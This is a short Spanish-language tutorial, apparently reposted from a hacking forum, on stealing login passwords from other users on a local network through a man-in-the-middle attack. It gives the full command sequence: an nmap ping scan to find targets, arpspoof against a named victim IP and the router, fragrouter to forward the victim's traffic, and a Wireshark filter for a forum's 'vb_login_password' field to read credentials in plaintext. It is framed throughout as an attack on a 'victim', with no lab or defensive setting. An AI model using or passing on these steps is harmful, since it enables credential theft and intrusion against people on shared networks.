Capturar password y contraseña de usuarios red local

#sudo apt-get install nmap (el famoso scaner)
#sudo apt-get install dsniff (un sniffer)
#sudo apt-get install wireshark (sniffer grafico)
#sudo apt-get install fragrouter (para devolver el trafico)
utilizaremos una tecnica que se comonce como el man in the middele consiste en engañar al router diciendole que nuestro ordenador es el de la victima de modo que su informacion pasara por el nuestro y podremos ver sus contraseñas seleccionando victima! en la tabla del router como decimos puede estar caducadas las victimas por eso es mejor buscarlas en directo para ello abriremos una consola i utilizaremos NMAP
#sudo nmap -sP 192.168.1.*
#sudo arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER
en mi caso:
sudo arpspoof -i wlan0 -t 192.168.1.37 192.168.1.1
lo dejamos en ejecucion en otra consola
#sudo fragrouter -i wlan0 -B1 y
a esta pasando todo el trafico de la victima por nuestra maquina para realizar el ejemplo ire a un objetivo concreto el pass de f.com si hacemos boton derecho ver codigo fuente veremos que la informacion del logeo veremos como el name del parametro es vb_login_password abrimos Wireshark (en modo root) en un terminal
#sudo wireshark.
es muyy simple por defecto la interfaz que tiene la ip damos a start y filtraremos los paquetes filter tcp contains login_password cuando la victima acceda a f.com y se loguee veremos una entrada http://www.blogger.com/img/blank.gif botón derecho del ratón "Follow tcp steam" y únicamente tenemos q buscar "vb_login_password" comentado anteriormente y tendremos su pass.
Fuente:http://www.hackxcrack.es/forum/index.php?topic=6466.0